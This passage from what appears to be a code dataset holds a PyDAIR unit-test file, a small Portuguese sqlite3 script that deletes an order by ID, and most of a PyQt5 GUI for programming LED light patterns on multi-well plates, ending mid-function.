PyDAIR.app.PyDAIRAPP import *\n\n_data_path = os.path.join(os.path.dirname(__file__), 'data/samples')\n_db_path = os.path.join(os.path.dirname(__file__), 'data/db')\n_result_path = os.path.join(os.path.dirname(__file__), 'data/results')\n\nclass Test_app(unittest.TestCase):\n \n def setUp(self):\n pass\n \n \n def test_app_parseseq(self):\n # variables settings\n v_gene_align_args = PyDAIRBlastArgs(_db_path + '/v', 3, -3, 6, 6, 21, 1e-80)\n d_gene_align_args = PyDAIRBlastArgs(_db_path + '/d', 1, -1, 0, 2, 4, 1)\n j_gene_align_args = PyDAIRBlastArgs(_db_path + '/j', 3, -3, 6, 6, 7, 1e-5)\n q_fasta = _data_path + '/sample.1.fa'\n v_gene_fasta = _db_path + '/v.fa'\n d_gene_fasta = _db_path + '/d.fa'\n j_gene_fasta = _db_path + '/j.fa'\n output_prefix = _result_path + '/test_output_app_parseseq'\n \n # PyDAIR arguemnts settings\n pydair_args = PyDAIRParseSeqArgs(q_fasta, v_gene_fasta, d_gene_fasta, j_gene_fasta,\n output_prefix,\n v_gene_align_args, d_gene_align_args, j_gene_align_args,\n v_motif = 'YYC', j_motif = 'WG.G')\n pydairapp = PyDAIRAPPParseSeq(pydair_args)\n pydairapp.blast('v')\n pydairapp.blast('j')\n pydairapp.parse_VJ()\n pydairapp.write_pydair()\n pydairapp.write_fasta('unaligned_seq')\n pydairapp.blast('d')\n pydairapp.parse_VDJ()\n pydairapp.write_pydair()\n \n \n \n def test_app_stats(self):\n sample_names = ['ID 1', 'ID 2', 'ID 3']\n pydair_files = [_data_path + '/sample.1.pydair',\n _data_path + '/sample.2.pydair',\n _data_path + '/sample.3.pydair']\n pydair_args = PyDAIRStatsArgs(sample_names, pydair_files, True, False, True, 2,\n _result_path + '/test_output_app_analysis_hasambigoD')\n pydairapp = PyDAIRAPPStats(pydair_args)\n pydairapp.write_summary()\n pydairapp.create_report()\n \n \n def test_app_eval(self):\n app_args = PyDAIREvalArgs(_data_path + '/sample.simseq.fa',\n _data_path + '/sample.simseq.parsed.pydair',\n _result_path + '/test_output_app_eval.txt')\n evalobj = PyDAIRAPPEval(app_args)\n evalobj.eval()\n \n \n def test_app_sim(self):\n app_args = PyDAIRSimArgs(_result_path + '/test_output_app_sim.fa',\n 100,\n _db_path + '/v.fa', 20, 3,\n _db_path + '/d.fa', 3, 3,\n _db_path + '/j.fa', 5, 3,\n 5, 5, 0.05, 1010)\n simobj = PyDAIRAPPSim(app_args)\n simobj.generate_seq()\n \n \n \nif __name__ == 
'__main__':\n unittest.main()\n\n","repo_name":"biunit/PyDAIR","sub_path":"PyDAIR/test/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"28330602566","text":"# criar um programa que remova pedidos com base no id da seguinte forma:\nimport sqlite3\nconexao = sqlite3.connect(\"Aula_Semana4\")\ncursor = conexao.cursor()\npedido_id = input(\"Qual o ID do pedido que deseja remover? \")\nvalores = [pedido_id]\nsql = \"delete from pedido where id = ?\"\ncursor.execute(sql, valores)\nconexao.commit()\nconexao.close()","repo_name":"valdinei84/Projetos-Python","sub_path":"MODULO 2 SQL E BANCO DE DADOS/Semana 4 Criando BD e inserindo dados/Removendo Dados.py","file_name":"Removendo Dados.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39647152803","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import * \nfrom PyQt5.QtCore import *\n\nfrom pyqtgraph import PlotWidget, plot\nimport pyqtgraph as pg\n\nimport ast\nimport os\n\nimport numpy as np\nfrom math import sqrt\n\nfrom wellInforamtion import wellInfoWindow\n\nbasedir = os.path.dirname(__file__)\n\nclass well_buttons(QWidget):#\n #Creation of widgets\n def __init__(self, framerate):\n super().__init__()\n\n self.plate_type = 96\n self.plate_nr = 0\n\n self.plate_nr_type = {0: 96, 1: 96}\n\n self.plate_width = 8\n self.plate_height = 12\n self.well_button_size = 30\n self.well_button_radius = 15\n\n self.color = 'Off'\n self.wvMax = 255\n self.wvMin = 0\n self.wvStart = 'Low'\n self.wvLen = 10\n self.dutyCyclePWM = 0.5\n self.periodPWM = 10\n\n self.framerate = framerate\n\n self.StepGBoxes = {}\n self.StepInformations = {}\n self.amount_of_steps = 1\n self.selceted_step = 1\n\n self.ButtonNrTL = 1\n self.selected_wells = set()\n self.used_wells_plate_1 = {}\n self.used_wells_plate_2 = {}\n self.Button_to_pos = {}\n self.Pos_to_Button = {}\n\n self.plotPreviewDisplayed = False\n self.wellInfoWin = None\n \n self.setWindowTitle('opto GUI')\n self.createPlotPreview(10)\n self.createPlateChooserBox()\n self.createCurrentStepBox()\n self.createProgrammBox()\n self.createActions()\n self.createContextMenu()\n \n self.selectWellsRB.setChecked(True)\n\n self.graphProgrammStack = QStackedWidget(self)\n self.graphProgrammStack.addWidget(self.ProgrammGBox)\n self.graphProgrammStack.addWidget(self.graphWidget)\n\n Programm_HLayout = QVBoxLayout()\n Programm_HLayout.addWidget(self.PlateChooserBox)\n Programm_HLayout.addWidget(self.graphProgrammStack)\n\n self.mainLayout = QHBoxLayout()\n self.mainLayout.addLayout(Programm_HLayout)\n self.mainLayout.addWidget(self.CurrentStepGBox)\n self.setLayout(self.mainLayout)\n\n def createwellButtonBox(self):\n\n self.wellButtonBox = QGroupBox(\"Select wells\")\n wells_layout = QGridLayout()\n\n rows_per_plate, cols_per_plate = self.plate_height, self.plate_width\n\n self.select_buttons = {}\n self.well_buttons = {}\n self.Button_to_pos = {}\n self.Pos_to_Button = {}\n\n self.select_all_button = QPushButton('All', self)\n self.select_all_button.\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\".format(radius = 15))\n self.select_all_button.setFixedSize(30, 30)\n self.select_all_button.clicked.connect(self.select_all)\n wells_layout.addWidget(self.select_all_button, 0, 0, alignment = Qt.AlignCenter)\n\n for col in range(cols_per_plate):\n col_nr = 
col + 1\n self.select_buttons['Button_C' + str(col_nr)] = QPushButton('', self)\n self.select_buttons['Button_C' + str(col_nr)].\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\".format(radius = 15))\n self.select_buttons['Button_C' + str(col_nr)].setIcon(QIcon(os.path.join(basedir, 'resources', 'arrow-down.svg')))\n self.select_buttons['Button_C' + str(col_nr)].setFixedSize(30, 30)\n self.select_buttons['Button_C' + str(col_nr)].clicked.connect(lambda ignore, i=col_nr: self.select_col(i))\n wells_layout.addWidget(self.select_buttons['Button_C' + str(col_nr)], 0, col + 1, alignment = Qt.AlignCenter)\n\n for row in range(rows_per_plate):\n row_nr = row + 1\n self.select_buttons['Button_R' + str(row_nr)] = QPushButton('', self)\n self.select_buttons['Button_R' + str(row_nr)].\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\".format(radius = 15))\n self.select_buttons['Button_R' + str(row_nr)].setIcon(QIcon(os.path.join(basedir, 'resources', 'arrow-right.svg')))\n self.select_buttons['Button_R' + str(row_nr)].setFixedSize(30, 30)\n self.select_buttons['Button_R' + str(row_nr)].clicked.connect(lambda ignore, i=row_nr: self.select_row(i))\n wells_layout.addWidget(self.select_buttons['Button_R' + str(row_nr)], row + 1, 0, alignment = Qt.AlignCenter)\n\n for x in range(cols_per_plate):\n for y in range(rows_per_plate):\n button_nr = x+y*cols_per_plate+1\n self.well_buttons['Button_' + str(button_nr)] = QPushButton('', self)\n self.Button_to_pos['Button_' + str(button_nr)] = (y, x)\n self.well_buttons['Button_' + str(button_nr)].\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\".format(radius = self.well_button_radius))\n self.well_buttons['Button_' + str(button_nr)].setFixedSize(self.well_button_size, self.well_button_size)\n self.well_buttons['Button_' + str(button_nr)].clicked.connect(lambda ignore, i=button_nr: self.select_wells(i))\n self.well_buttons['Button_' + str(button_nr)].setContextMenuPolicy(Qt.CustomContextMenu)\n self.well_buttons['Button_' + str(button_nr)].customContextMenuRequested.connect(lambda point, i=button_nr: self.showWellContextMenu(i, point))\n wells_layout.addWidget(self.well_buttons['Button_' + str(button_nr)], y+1, x+1)\n self.wellButtonBox.setLayout(wells_layout)\n self.Pos_to_Button = {y: x for x, y in self.Button_to_pos.items()}\n\n def createPlateChooserBox(self):\n self.PlateChooserBox = QGroupBox(\"Choose Plate\")\n chooserForm_layout = QFormLayout()\n\n self.plate_chooser_CB = QComboBox()\n self.plate_chooser_CB.addItem(\"Plate 1\")\n self.plate_chooser_CB.addItem(\"Plate 2\")\n self.plate_chooser_CB.addItem(\"---\")\n\n self.plate_chooser_CBView = self.plate_chooser_CB.view()\n self.plate_chooser_CBView.setRowHidden(2, True)\n\n self.plate_chooser_CB.currentIndexChanged.connect(self.changePlate)\n\n self.plate_type_CB = QComboBox()\n self.plate_type_CB.addItem(\"96-well Plate\")\n self.plate_type_CB.addItem(\"24-well Plate\")\n self.plate_type_CB.addItem(\"6-well Plate\")\n self.plate_type_CB.addItem(\"Custom Shape\")\n\n self.plate_type_CBView = self.plate_type_CB.view()\n self.plate_type_CBView.setRowHidden(3, True)\n\n self.plate_type_CB.currentIndexChanged.connect(self.changePlateType)\n\n self.duplicate_plate_button = QPushButton('Duplicate Plate', self)\n self.duplicate_plate_button.clicked.connect(self.duplicate_plate)\n\n chooserForm_layout.addRow(QLabel('Choose Plate'), self.plate_chooser_CB)\n chooserForm_layout.addRow(QLabel('Choose Plate Type'), self.plate_type_CB)\n 
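# 'Duplicate Plate' is wired to self.duplicate_plate (defined outside this excerpt); presumably it copies the current plate's wells onto the other plate\n        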
chooserForm_layout.addRow(QLabel(''), self.duplicate_plate_button)\n\n self.PlateChooserBox.setLayout(chooserForm_layout)\n\n def createParameterBox(self):\n self.ParameterBox = QGroupBox(\"Animate wells\")\n self.ParameterFormlayout = QFormLayout()\n\n self.color_chooser = QComboBox()\n self.color_chooser.addItem(\"Off\")\n self.color_chooser.addItem(\"Red\")\n self.color_chooser.addItem(\"Green\")\n self.color_chooser.addItem(\"Blue\")\n self.color_chooser.setCurrentText(self.color)\n self.color_chooser.currentIndexChanged.connect(self.changeWavetype)\n\n self.waveTypeCB = QComboBox()\n self.waveTypeCB.addItem(\"Constant\")\n self.waveTypeCB.addItem(\"Sine Wave\")\n self.waveTypeCB.addItem(\"Tri Wave\")\n self.waveTypeCB.addItem(\"Square Wave\")\n self.waveTypeCB.addItem(\"PWM\")\n self.waveTypeCB.addItem(\"Rise\")\n self.waveTypeCB.addItem(\"Fall\")\n self.waveTypeCB.setItemIcon(0, QIcon(os.path.join(basedir, 'resources', 'animation-static.svg')))\n self.waveTypeCB.setItemIcon(1, QIcon(os.path.join(basedir, 'resources', 'animation-sin.svg')))\n self.waveTypeCB.setItemIcon(2, QIcon(os.path.join(basedir, 'resources', 'animation-tri.svg')))\n self.waveTypeCB.setItemIcon(3, QIcon(os.path.join(basedir, 'resources', 'animation-sq.svg')))\n self.waveTypeCB.setItemIcon(4, QIcon(os.path.join(basedir, 'resources', 'animation-blink.svg')))\n self.waveTypeCB.setItemIcon(5, QIcon(os.path.join(basedir, 'resources', 'animation-rise.svg')))\n self.waveTypeCB.setItemIcon(6, QIcon(os.path.join(basedir, 'resources', 'animation-fall.svg')))\n self.waveTypeCB.currentIndexChanged.connect(self.changeWavetype)\n\n self.ParameterFormlayout.addRow(QLabel('Color: '), self.color_chooser)\n self.ParameterFormlayout.addRow(QLabel('Type: '), self.waveTypeCB)\n\n self.ParameterBox.setLayout(self.ParameterFormlayout)\n\n self.changeWavetype()\n\n def createGradientDesingerBox(self):\n self.GradientBox = QGroupBox(\"Gradient\")\n gradientForm_layout = QFormLayout()\n gradientSize_layout = QHBoxLayout()\n\n self.color_chooser_gradient = QComboBox()\n self.color_chooser_gradient.addItem(\"Red\")\n self.color_chooser_gradient.addItem(\"Green\")\n self.color_chooser_gradient.addItem(\"Blue\")\n\n self.width_gradient = QSpinBox()\n self.width_gradient.setMaximum(self.plate_width)\n self.width_gradient.setMinimum(2)\n self.width_gradient.setValue(8)\n self.width_gradient.valueChanged.connect(lambda: self.select_wells(self.ButtonNrTL))\n self.height_gradient = QSpinBox()\n self.height_gradient.setMaximum(self.plate_height)\n self.height_gradient.setMinimum(2)\n self.height_gradient.setValue(12)\n self.height_gradient.valueChanged.connect(lambda: self.select_wells(self.ButtonNrTL))\n gradientSize_layout.addWidget(self.width_gradient)\n gradientSize_layout.addWidget(QLabel(\"x\"))\n gradientSize_layout.addWidget(self.height_gradient)\n\n self.direction_chooser_gradient = QComboBox()\n self.direction_chooser_gradient.addItem(\"Top --> Bottom\")\n self.direction_chooser_gradient.addItem(\"Bottom --> Top\")\n self.direction_chooser_gradient.addItem(\"Left --> Right\")\n self.direction_chooser_gradient.addItem(\"Right --> Left\")\n\n self.max_gradient = QSpinBox()\n self.max_gradient.setMaximum(255)\n self.max_gradient.setValue(255)\n self.min_gradient = QSpinBox()\n self.min_gradient.setMaximum(254)\n self.min_gradient.valueChanged.connect(lambda x: self.max_gradient.setMinimum(self.min_gradient.value() + 1))\n self.max_gradient.valueChanged.connect(lambda x: self.min_gradient.setMaximum(self.max_gradient.value() - 1))\n\n 
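# the valueChanged hooks above cross-clamp the two spin boxes so the gradient range always satisfies min < max\n        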
gradientForm_layout.addRow(QLabel('Color'), self.color_chooser_gradient)\n gradientForm_layout.addRow(QLabel('Size'), gradientSize_layout)\n gradientForm_layout.addRow(QLabel('Direction'), self.direction_chooser_gradient)\n gradientForm_layout.addRow(QLabel('Min. intensity'), self.min_gradient)\n gradientForm_layout.addRow(QLabel('Max. intensity'), self.max_gradient)\n\n self.apply_button_gradient = QPushButton('Apply', self)\n self.apply_button_gradient.clicked.connect(self.createGradient)\n self.apply_button_gradient.setDefault(True)\n gradientForm_layout.addRow(QLabel(), self.apply_button_gradient)\n\n self.GradientBox.setLayout(gradientForm_layout)\n\n def createPlotPreview(self, stepLength):\n self.graphWidget = pg.PlotWidget()\n self.pen = pg.mkPen(color='red', width=2)\n\n self.graphWidget.setBackground('w')\n self.graphWidget.setLimits(xMin = 0, xMax = stepLength - self.framerate + (stepLength - self.framerate) * 0.05, yMin = -1, yMax = 256, minXRange = 5, minYRange = 25)\n labelStyle = {'color': 'black', 'font-size': '12pt'}\n self.graphWidget.setLabel('bottom', \"Time / min\", **labelStyle)\n self.graphWidget.setLabel('left', \"Intensity\", **labelStyle)\n self.graphWidget.setXRange(0, stepLength - self.framerate + (stepLength - self.framerate) * 0.05)\n self.graphWidget.setYRange(0, 260)\n\n self.data_line = self.graphWidget.plot([0], [0], pen=self.pen)\n\n def createCurrentStepBox(self):\n self.CurrentStepGBox = QGroupBox(\"Step 1\")\n self.CurrentStepGBox_Layout = QHBoxLayout()\n Parameter_Layout = QVBoxLayout()\n Preview_select_Layout = QVBoxLayout()\n\n rb_layout = QHBoxLayout()\n self.selectWellsRB = QRadioButton(\"Select wells\")\n self.selectWellsRB.toggled.connect(lambda: self.changeSelectionType(0))\n rb_layout.addWidget(self.selectWellsRB)\n self.getSettingsRB = QRadioButton(\"Get Settings\")\n self.getSettingsRB.toggled.connect(lambda: self.changeSelectionType(2))\n rb_layout.addWidget(self.getSettingsRB)\n self.createGradientRB = QRadioButton(\"Create gradient\")\n self.createGradientRB.toggled.connect(lambda: self.changeSelectionType(1))\n rb_layout.addWidget(self.createGradientRB)\n\n self.createwellButtonBox()\n self.createParameterBox()\n self.createGradientDesingerBox()\n \n Parameter_Layout.addLayout(rb_layout)\n Parameter_Layout.addWidget(self.ParameterBox)\n Parameter_Layout.addWidget(self.GradientBox)\n\n Preview_select_Layout.addStretch()\n Preview_select_Layout.addWidget(self.wellButtonBox)\n Preview_select_Layout.addStretch()\n\n self.CurrentStepGBox_Layout.addLayout(Parameter_Layout)\n self.CurrentStepGBox_Layout.addLayout(Preview_select_Layout)\n\n self.CurrentStepGBox.setLayout(self.CurrentStepGBox_Layout)\n\n def createProgrammBox(self):\n self.ProgrammGBox = QGroupBox(\"Programm\")\n ProgrammBox_layout = QVBoxLayout()\n\n self.addProgram_Button = QPushButton('Add Step', self)\n self.addProgram_Button.clicked.connect(self.addStep)\n\n self.scrollArea = QScrollArea()\n self.scrollArea.setWidgetResizable(True)\n self.scrollAreaWidget = QWidget()\n self.scrollAreaWidgetLayout = QVBoxLayout(self.scrollAreaWidget)\n self.scrollAreaWidgetLayout.addItem(QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.Expanding))\n self.scrollArea.setWidget(self.scrollAreaWidget)\n self.scrollArea.setMinimumWidth(400)\n self.addStepBox()\n self.changeStep(1)\n\n ProgrammBox_layout.addWidget(self.addProgram_Button)\n ProgrammBox_layout.addWidget(self.scrollArea)\n \n self.ProgrammGBox.setLayout(ProgrammBox_layout)\n\n def addStepBox(self, newStep = True):\n step_nr = 
self.amount_of_steps\n #StepBox Dict: step_nr: step_nr(0), GroupBox(1), EditButton(2), Delete Button(3), Hour spinBox(4), Min spinBox(5), Sec SpinBox(6)\n self.StepGBoxes[step_nr] = [step_nr,\n QGroupBox('Step ' + str(self.amount_of_steps), self.scrollAreaWidget),\n QPushButton('Edit', self), \n QPushButton('Delete', self),\n QSpinBox(), QSpinBox(), QSpinBox(),\n QPushButton('', self), \n QPushButton('', self)]\n \n self.StepGBoxes[step_nr][2].clicked.connect(lambda ignore: self.changeStep(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][3].clicked.connect(lambda ignore: self.deleteStep(self.StepGBoxes[step_nr][0]))\n\n self.StepGBoxes[step_nr][7].setStyleSheet('border: 0px solid black')\n self.StepGBoxes[step_nr][7].setIcon(QIcon(os.path.join(basedir, 'resources', 'arrow-up.svg')))\n self.StepGBoxes[step_nr][8].setStyleSheet('border: 0px solid black')\n self.StepGBoxes[step_nr][8].setIcon(QIcon(os.path.join(basedir, 'resources', 'arrow-down.svg')))\n\n self.StepGBoxes[step_nr][7].clicked.connect(lambda ignore: self.moveStepUp(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][8].clicked.connect(lambda ignore: self.moveStepDown(self.StepGBoxes[step_nr][0]))\n\n self.StepGBoxes[step_nr][4].setSuffix(' h')\n self.StepGBoxes[step_nr][4].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][5].setSuffix(' min')\n self.StepGBoxes[step_nr][5].setMaximum(59)\n self.StepGBoxes[step_nr][5].setValue(10)\n self.StepGBoxes[step_nr][5].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][6].setSuffix(' sec')\n self.StepGBoxes[step_nr][6].setMaximum(59)\n self.StepGBoxes[step_nr][6].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n\n StepGBox_Layout = QGridLayout(self.StepGBoxes[step_nr][1]) \n StepGBox_Layout.addWidget(QLabel('Set duration'), 0, 1, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][4], 0, 2, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][5], 0, 3, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][6], 0, 4, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][2], 1, 3, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][3], 1, 4, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][7], 0, 0, 1, 1)\n StepGBox_Layout.addWidget(self.StepGBoxes[step_nr][8], 1, 0, 1, 1)\n\n count = self.scrollAreaWidgetLayout.count() - 1\n self.scrollAreaWidgetLayout.insertWidget(count, self.StepGBoxes[step_nr][1])\n\n if newStep:\n self.StepInformations[step_nr] = [[self.StepGBoxes[step_nr][4].value(), self.StepGBoxes[step_nr][5].value(), self.StepGBoxes[step_nr][6].value()],\\\n {'Plate 1 Wells': {}, 'Plate 1 Type': self.plate_nr_type[0], 'Plate 2 Wells': {}, 'Plate 2 Type': self.plate_nr_type[1]}]\n\n #Actions and Menus\n def createActions(self):\n self.wellInformationAction = QAction('Informations', self)\n self.wellInformationAction.triggered.connect(self.showWellInformations)\n self.wellSettingsAction = QAction('Get Settings', self)\n self.wellSettingsAction.triggered.connect(self.getWellSettings) \n\n def createContextMenu(self):\n self.wellMenu = QMenu(self)\n self.wellMenu.addAction(self.wellInformationAction)\n self.wellMenu.addAction(self.wellSettingsAction)\n \n def showWellContextMenu(self, button_nr, point):\n button = 'Button_' + str(button_nr)\n self.rightClickButtonNr = button_nr\n self.wellMenu.exec_(self.well_buttons[button].mapToGlobal(point))\n\n # 
Functions\n def moveStepUp(self, step_nr):\n if step_nr > 1:\n selectedStep = self.StepInformations[step_nr].copy()\n topStep = self.StepInformations[step_nr - 1].copy()\n\n self.StepInformations[step_nr] = topStep\n self.StepInformations[step_nr - 1] = selectedStep\n\n topH = topStep[0][0]\n topM = topStep[0][1]\n topS = topStep[0][2]\n\n selH = selectedStep[0][0]\n selM = selectedStep[0][1]\n selS = selectedStep[0][2]\n\n self.StepGBoxes[step_nr][4].setValue(topH)\n self.StepGBoxes[step_nr][5].setValue(topM)\n self.StepGBoxes[step_nr][6].setValue(topS)\n\n self.StepGBoxes[step_nr - 1][4].setValue(selH)\n self.StepGBoxes[step_nr - 1][5].setValue(selM)\n self.StepGBoxes[step_nr - 1][6].setValue(selS)\n\n self.changeStep(step_nr - 1, modify_Step = True)\n \n def moveStepDown(self, step_nr):\n if step_nr < self.amount_of_steps:\n selectedStep = self.StepInformations[step_nr].copy()\n lowStep = self.StepInformations[step_nr + 1].copy()\n\n self.StepInformations[step_nr] = lowStep\n self.StepInformations[step_nr + 1] = selectedStep\n\n lowH = lowStep[0][0]\n lowM = lowStep[0][1]\n lowS = lowStep[0][2]\n\n selH = selectedStep[0][0]\n selM = selectedStep[0][1]\n selS = selectedStep[0][2]\n\n self.StepGBoxes[step_nr][4].setValue(lowH)\n self.StepGBoxes[step_nr][5].setValue(lowM)\n self.StepGBoxes[step_nr][6].setValue(lowS)\n\n self.StepGBoxes[step_nr + 1][4].setValue(selH)\n self.StepGBoxes[step_nr + 1][5].setValue(selM)\n self.StepGBoxes[step_nr + 1][6].setValue(selS)\n\n self.changeStep(step_nr + 1, modify_Step = True)\n\n def getWellSettings(self, button_nr = None):\n if button_nr is None:\n well = 'Button_' + str(self.rightClickButtonNr)\n else:\n well = 'Button_' + str(button_nr)\n wellinfo = {} \n if self.plate_nr == 0:\n try:\n wellinfo = self.StepInformations[self.selceted_step][1]['Plate 1 Wells'][well]\n except:\n wellinfo = None\n elif self.plate_nr == 1:\n try:\n wellinfo = self.StepInformations[self.selceted_step][1]['Plate 2 Wells'][well]\n except:\n wellinfo = None\n\n if wellinfo is not None:\n self.color = wellinfo['color']\n self.color_chooser.setCurrentText(self.color)\n wvType = wellinfo['waveType']\n\n if wvType == 'const':\n self.waveTypeCB.setCurrentIndex(0)\n elif wvType == 'sin':\n self.waveTypeCB.setCurrentIndex(1)\n elif wvType == 'tri':\n self.waveTypeCB.setCurrentIndex(2)\n elif wvType == 'sq':\n self.waveTypeCB.setCurrentIndex(3)\n elif wvType == 'pwm':\n self.waveTypeCB.setCurrentIndex(4)\n elif wvType == 'rise':\n self.waveTypeCB.setCurrentIndex(5)\n elif wvType == 'fall':\n self.waveTypeCB.setCurrentIndex(6)\n\n self.wvMax = wellinfo['maxVal']\n self.maxIntensitySB.setValue(self.wvMax)\n self.maxIntensitySlider.setValue(self.wvMax)\n\n if wvType not in {'pwm', 'const'}:\n self.wvMin = wellinfo['minVal']\n self.minIntensitySB.setValue(self.wvMin)\n if wvType not in {'rise', 'fall'}:\n self.wvLen = wellinfo['wvLen']\n self.wavelengthSB.setValue(self.wvLen)\n elif wvType != 'const':\n self.periodPWM = wellinfo['periodPWM']\n self.periodPWMSB.setValue(self.periodPWM)\n self.dutyCyclePWM = wellinfo['dutyCyclePWM']\n self.dutyCycleSB.setValue(int(self.dutyCyclePWM * 100))\n if wvType not in {'rise', 'fall', 'const'}:\n self.wvStart = wellinfo['start']\n self.startAnimationCB.setCurrentText(self.wvStart)\n\n def showWellInformations(self):\n self.wellInfoWin = wellInfoWindow(buttonNr = self.rightClickButtonNr, plateNr = self.plate_nr, plateInfo = self.StepInformations, framerate = self.framerate)\n self.wellInfoWin.closed.connect(self.closeInfo)\n 
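# closeInfo (connected above) clears the cached window reference once the dialog is dismissed\n        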
self.wellInfoWin.show()\n\n    def closeInfo(self):\n        self.wellInfoWin = None\n\n    def changeWavetype(self):\n        for row in range(self.ParameterFormlayout.rowCount() - 2):\n            self.ParameterFormlayout.removeRow(2)\n\n        self.color = self.color_chooser.currentText()\n\n        self.maxIntensitySB = QSpinBox()\n        self.maxIntensitySB.setMaximum(255)\n        self.maxIntensitySB.setMinimum(0)\n        self.maxIntensitySB.setValue(self.wvMax)\n        self.minIntensitySB = QSpinBox()\n        self.minIntensitySB.setMaximum(254)\n        self.minIntensitySB.setValue(self.wvMin)\n\n        self.maxIntensitySlider = QSlider(Qt.Horizontal)\n        self.maxIntensitySlider.setMaximum(255)\n        self.maxIntensitySlider.setValue(self.wvMax)\n\n        self.maxIntensitySB.valueChanged.connect(lambda ignore: self.maxIntensitySlider.setValue(self.maxIntensitySB.value()))\n        self.maxIntensitySB.valueChanged.connect(lambda ignore: self.minIntensitySB.setMaximum(self.maxIntensitySB.value() - 1))\n        self.maxIntensitySB.valueChanged.connect(self.updatePlot)\n        self.minIntensitySB.valueChanged.connect(lambda ignore: self.maxIntensitySB.setMinimum(self.minIntensitySB.value() + 1))\n        self.minIntensitySB.valueChanged.connect(self.updatePlot)\n\n        self.maxIntensitySlider.valueChanged.connect(lambda ignore: self.maxIntensitySB.setValue(self.maxIntensitySlider.value()))\n        self.maxIntensitySlider.valueChanged.connect(self.updatePlot)\n\n        self.wavelengthSB = QSpinBox()\n        self.wavelengthSB.setSuffix(' min')\n        self.wavelengthSB.setMinimum(1)\n        self.wavelengthSB.setValue(self.wvLen)\n        self.wavelengthSB.valueChanged.connect(lambda ignore: self.updatePlot())\n\n        self.startAnimationCB = QComboBox()\n        self.startAnimationCB.addItem('High')\n        self.startAnimationCB.addItem('Low')\n        self.startAnimationCB.setCurrentText(self.wvStart)\n        self.startAnimationCB.currentIndexChanged.connect(lambda ignore: self.updatePlot())\n\n        self.dutyCycleSB = QSpinBox()\n        self.dutyCycleSB.setSuffix(' %')\n        self.dutyCycleSB.setMinimum(0)\n        self.dutyCycleSB.setMaximum(100)\n        self.dutyCycleSB.setValue(int(self.dutyCyclePWM * 100))\n        self.dutyCycleSB.valueChanged.connect(lambda ignore: self.updatePlot())\n\n        self.periodPWMSB = QSpinBox()\n        self.periodPWMSB.setSuffix(' min')\n        self.periodPWMSB.setMinimum(1)\n        self.periodPWMSB.setValue(self.periodPWM)\n        self.periodPWMSB.valueChanged.connect(lambda ignore: self.updatePlot())\n\n        if self.color_chooser.currentIndex() == 0:\n            self.waveTypeCB.setDisabled(True)\n        else:\n            self.pen = pg.mkPen(color=self.color_chooser.currentText().lower(), width=2)\n            self.waveTypeCB.setDisabled(False)\n        if self.waveTypeCB.currentIndex() in {1, 2, 3, 5, 6}:\n            self.ParameterFormlayout.addRow(QLabel('Max. Intensity: '), self.maxIntensitySB)\n        elif self.waveTypeCB.currentIndex() in {0, 4}:\n            maxIntensityLayout = QHBoxLayout()\n            maxIntensityLayout.addWidget(self.maxIntensitySlider)\n            maxIntensityLayout.addWidget(self.maxIntensitySB)\n            self.ParameterFormlayout.addRow(QLabel('Intensity: '), maxIntensityLayout)\n        if self.waveTypeCB.currentIndex() in {1, 2, 3, 5, 6}:\n            self.ParameterFormlayout.addRow(QLabel('Min. 
Intensity: '), self.minIntensitySB)\n if self.waveTypeCB.currentIndex() in {1, 2, 3}:\n self.ParameterFormlayout.addRow(QLabel('Wavelength: '), self.wavelengthSB)\n if self.waveTypeCB.currentIndex() == 4:\n self.ParameterFormlayout.addRow(QLabel('Off time: '), self.dutyCycleSB)\n if self.waveTypeCB.currentIndex() == 4:\n self.ParameterFormlayout.addRow(QLabel('Period: '), self.periodPWMSB)\n if self.waveTypeCB.currentIndex() in {1, 2, 3, 4}:\n self.ParameterFormlayout.addRow(QLabel('Starting Intensity: '), self.startAnimationCB)\n \n self.showPlotCB = QCheckBox()\n self.showPlotCB.stateChanged.connect(self.showPlot)\n\n self.applyChangesButton = QPushButton('Apply', self)\n self.applyChangesButton.clicked.connect(self.applyParameterChanges)\n self.applyChangesButton.setDefault(True)\n\n self.ParameterFormlayout.addRow(QLabel('Show preview'), self.showPlotCB)\n self.ParameterFormlayout.addRow(QLabel(), self.applyChangesButton)\n\n if self.getSettingsRB.isChecked():\n self.applyChangesButton.setDisabled(True)\n if self.plotPreviewDisplayed:\n self.showPlotCB.setChecked(True)\n\n self.updatePlot()\n\n def updatePlot(self):\n self.wvMax = self.maxIntensitySB.value()\n self.wvMin = self.minIntensitySB.value()\n self.wvStart = self.startAnimationCB.currentText()\n self.wvLen = self.wavelengthSB.value()\n self.dutyCyclePWM = (self.dutyCycleSB.value() / 100)\n self.periodPWM = self.periodPWMSB.value()\n\n try:\n stepLength = self.StepInformations[self.selceted_step][0][0] * 60 + \\\n self.StepInformations[self.selceted_step][0][1] + self.StepInformations[self.selceted_step][0][2] / 60 + self.framerate\n except:\n stepLength = 10\n\n dp_x = []\n dp_y = []\n\n if self.color_chooser.currentIndex() == 0:\n self.graphWidget.removeItem(self.data_line)\n else:\n # Const\n if self.waveTypeCB.currentIndex() == 0:\n dp_x = 